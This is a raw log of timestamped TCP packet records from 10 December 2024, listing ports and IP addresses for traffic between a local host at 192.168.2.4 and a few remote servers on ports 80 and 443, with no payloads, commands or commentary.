Dec 10, 2024 00:42:07.931418896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.931468964 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.932318926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.932369947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.932456017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.932501078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.933348894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.933402061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.933413029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.933456898 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.934426069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.934475899 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.934581041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.934628010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.935430050 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.935487986 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.935513973 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.935558081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.936523914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.936567068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.936582088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.936625957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.937480927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.937530994 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.975625992 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.975684881 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.975723982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.975775003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.976140976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.976191044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.976218939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.976269960 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.977152109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.977204084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.977241993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.977292061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.978156090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.978202105 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.978269100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.978317022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.979217052 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.979264975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.979345083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.979398012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.980300903 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.980350018 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.980405092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.980452061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.981271029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.981316090 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.981348991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.981395960 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.982307911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.982355118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.982376099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.982431889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.983336926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.983387947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.983418941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.983464956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.984396935 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.984445095 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.984532118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.984579086 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.985419035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.985470057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.985500097 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.985552073 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.986485958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.986521006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.986552000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.986572981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.987461090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.987509966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.987541914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.987585068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.988476992 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.988545895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.988725901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:09.720663071 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.720670938 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.720778942 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.720789909 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.720810890 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.720835924 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.720921040 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.720943928 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.720998049 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721020937 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721040010 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.721085072 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721410990 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721424103 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.721565008 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721575022 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.721735954 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721749067 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:09.721857071 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:09.721873999 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.437525034 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.438862085 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.439038992 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.441044092 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.450695992 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.450712919 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.450798988 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.450807095 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.450970888 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.450993061 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.451903105 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.451960087 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.452018023 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.452069998 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.452164888 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.452214003 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.454704046 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.454719067 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.456260920 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.456319094 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.501497984 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.501595974 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.525744915 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.525855064 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.542165995 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.542181969 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.558007956 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.558084965 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.559912920 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.560043097 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.560161114 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.560370922 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.560384035 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.560448885 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.560461998 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.560520887 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.560537100 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.603332043 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.604635954 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.605052948 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.605089903 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.704483032 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.704598904 CET	443	49734	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:11.704659939 CET	49734	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:11.707556963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:11.707628012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:12.360902071 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.361057997 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.363737106 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.365478039 CET	49737	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.365489006 CET	443	49737	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376579046 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376734972 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376760960 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376790047 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376810074 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.376837969 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.376849890 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.377759933 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.377927065 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.377984047 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.397267103 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.397316933 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.397381067 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.397391081 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.398381948 CET	49735	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.398403883 CET	443	49735	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.398406982 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.401365995 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.410516977 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.411035061 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.411041021 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.464536905 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.497395039 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.542650938 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.564532995 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.569763899 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.569828987 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.569843054 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.582011938 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.582067013 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.582073927 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.595189095 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.595251083 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.595257998 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.601860046 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.601917028 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.601922989 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.617753983 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.617811918 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.617818117 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.629046917 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.629103899 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.629110098 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.642266989 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.642318010 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.642324924 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.654865026 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.655008078 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.655014038 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.668586969 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.669090986 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.669097900 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.685887098 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.686162949 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.686170101 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.691755056 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.693084955 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.693090916 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.745522022 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.755912066 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.758179903 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.761087894 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.761095047 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.764236927 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.764302015 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.764307976 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.774390936 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.774693966 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.774768114 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.774775028 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.777079105 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.784218073 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.796869993 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.796971083 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.797030926 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.797039986 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.797485113 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.808397055 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.820405960 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.820539951 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.820744991 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.820751905 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.820801973 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.830826044 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.841595888 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.841716051 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.841768980 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.841774940 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.845071077 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.852272034 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.863152027 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.863214016 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.863276005 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.863281965 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.865072012 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.890697956 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894690037 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894762993 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894793987 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.894802094 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894910097 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894954920 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.894959927 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.894998074 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.902842045 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.911801100 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.911876917 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.911883116 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.920214891 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.920317888 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.920376062 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.920382023 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.921076059 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.929058075 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.937916994 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.937946081 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.938020945 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.938028097 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.939425945 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.939435005 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.953617096 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.953689098 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.953697920 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.956931114 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.957072020 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.957082033 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.961884975 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.961930037 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.961935997 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.967327118 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.967377901 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.967385054 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.974567890 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.976759911 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.976823092 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.976830006 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.976963043 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.978169918 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.983609915 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.984580994 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.984586954 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.988989115 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.989065886 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.989072084 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.994457006 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.997067928 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.997075081 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.999876976 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:12.999932051 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:12.999938965 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.004101038 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.005072117 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.005078077 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.009439945 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.010380983 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.010438919 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.010577917 CET	49736	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.010587931 CET	443	49736	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.528697014 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.528723955 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:13.528794050 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.529083014 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:13.529095888 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:14.516848087 CET	49672	443	192.168.2.4	173.222.162.32
Dec 10, 2024 00:42:14.516886950 CET	443	49672	173.222.162.32	192.168.2.4
Dec 10, 2024 00:42:15.173784971 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:15.174149990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:15.219763041 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:15.220288992 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:15.220304012 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:15.220635891 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:15.221237898 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:15.221301079 CET	443	49745	142.250.181.68	192.168.2.4
Dec 10, 2024 00:42:15.261249065 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:15.294356108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:15.294894934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:15.294964075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:15.295196056 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:15.416208982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:17.112795115 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:17.113105059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:17.246860981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:17.246901035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:17.301497936 CET	49745	443	192.168.2.4	142.250.181.68
Dec 10, 2024 00:42:17.368571997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:17.368638992 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:17.438097954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:18.296518087 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:18.296581030 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:18.313792944 CET	49749	80	192.168.2.4	185.215.113.206
